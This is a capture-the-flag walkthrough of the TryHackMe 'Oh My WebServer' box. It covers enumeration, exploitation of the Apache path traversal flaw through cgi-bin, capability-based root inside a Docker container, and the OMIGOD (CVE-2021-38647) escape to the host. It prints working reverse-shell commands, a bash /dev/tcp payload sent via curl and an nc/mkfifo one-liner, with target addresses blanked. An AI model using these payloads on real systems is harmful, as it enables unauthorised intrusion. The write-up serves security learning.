Tryhackme: OhMyWeb Walkthrough

Vineeth Bharadwaj P
4 min readMar 7, 2022

This is a medium level box with some very famous vulnerabilities of 2021. Upon initial exploitation, we will endup in a docker container where we will find the user flag. We then breakout of the docker container to get to the root flag.

Link to the box: Oh My WebServer


I do a quick nmap scan and there are only 2 services running.

nmap -sV -sC -T4 -vv -Pn -oN nmap_quick
nmap scan results

Opening the IP address in the browser takes us to the following site. I tried messing around the text boxes in the site, and nothing interesting was found.

Enumerating the directories using ffuf, the cgi-bin/ directory gave the possible clue for the exploit.

Enumerating directories

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u


By looking at the Apache version, I got to know it is vulnerable to the Apache path traversal vulnerability.

I ran the following to confirm the vulnerability.

Apache path traversal vulnerability

Now, to get the reverse shell, I started a netcat listener, and ran the following:

curl -v '' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/ 0>&1' -H "Content-Type: text/plain"

I stabilized the reverse shell, and started looking around.
Looks like we are inside a docker container.

Next to elevate our privileges inside the container, I found the way when I listed the enabled capabilities. I use this to get root on the docker.
Note: we are not the root on the actual machine yet, this is just the docker container.

getcap -r / 2>/dev/null
root in docker

Searching inside the docker container, I found the user flag.

find / -type f -name “user.txt” 2>/dev/null
cat /root/user.txt


We need to break out of the docker container to find the root flag. When I ran the ifconfig, I came across the local IPs we can enumerate and exploit.

First, we need the static-binaries for the enumeration.

You can get the static binaries here:

I uploaded the static binaries using the simple python http server trick.
Note: On the docker, there is no wget, hence we have to use curl to upload the binaries.

curl -v http://<target_ip>/nmap -o nmap
uploading static nmap binary

After uploading, I make the binary executable

chmod +x ./nmap

Upon scanning a small IP address range, I find the interesting IP address I can try to exploit.

nmap scan of ip addresses

Some more enumeration on the IP address using nmap:

./nmap -p- --min/rate 5000
nmap scan of the possible target

We see 4 services running on this IP.
Searching around exploits for port 5986, I came across a lot of WinRM stuff. But none of them seem interesting here, and then I came across omi god vulnerability (CVE-2021-38647).

The exploit is a simple python file, which you can download from here:

I downloaded it to my attack machine, and then uploaded it to the docker container.
Once the exploit is uploaded, running it is simple and I got the root flag.

Bonus — revese shell as root from the actual machine

There is a netcat binary ‘nc’ on the machine, which we can use to get another reverse shell as a root user from the actual machine.

I setup another netcat listener on port 1111 on my attack machine, and I run the command

python3.7 -t -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 1111 >/tmp/f'

Now, I have the reverse shell as root from the actual machine :)

reverse shell as root from actual machine



Vineeth Bharadwaj P

Automotive/I.T Security. Artist. Photographer. Germany/India